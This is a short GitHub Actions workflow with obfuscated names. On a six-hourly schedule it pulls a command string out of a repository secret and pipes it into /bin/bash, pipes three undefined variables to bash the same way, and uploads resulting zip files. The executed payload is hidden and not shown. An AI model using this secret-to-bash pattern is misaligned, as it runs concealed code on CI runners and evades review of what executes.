name: zhifeihaoyan
on:
  workflow_dispatch:

  schedule:
    - cron: '20 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhifeihaoyan
        env:
          ley3: ${{ secrets.ley3 }}
        run: |
          printf '%s' "$ley3" | jq -r .urnw6470 | /bin/bash
          echo $txwoq90010 | jq -r .sz09974 | /bin/bash
          echo $eur734 | jq -r .cyxo067 | /bin/bash
          echo $k7 | jq -r .t5491 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: pmk2W6nm
          path: "*.zip"
          retention-days: 1
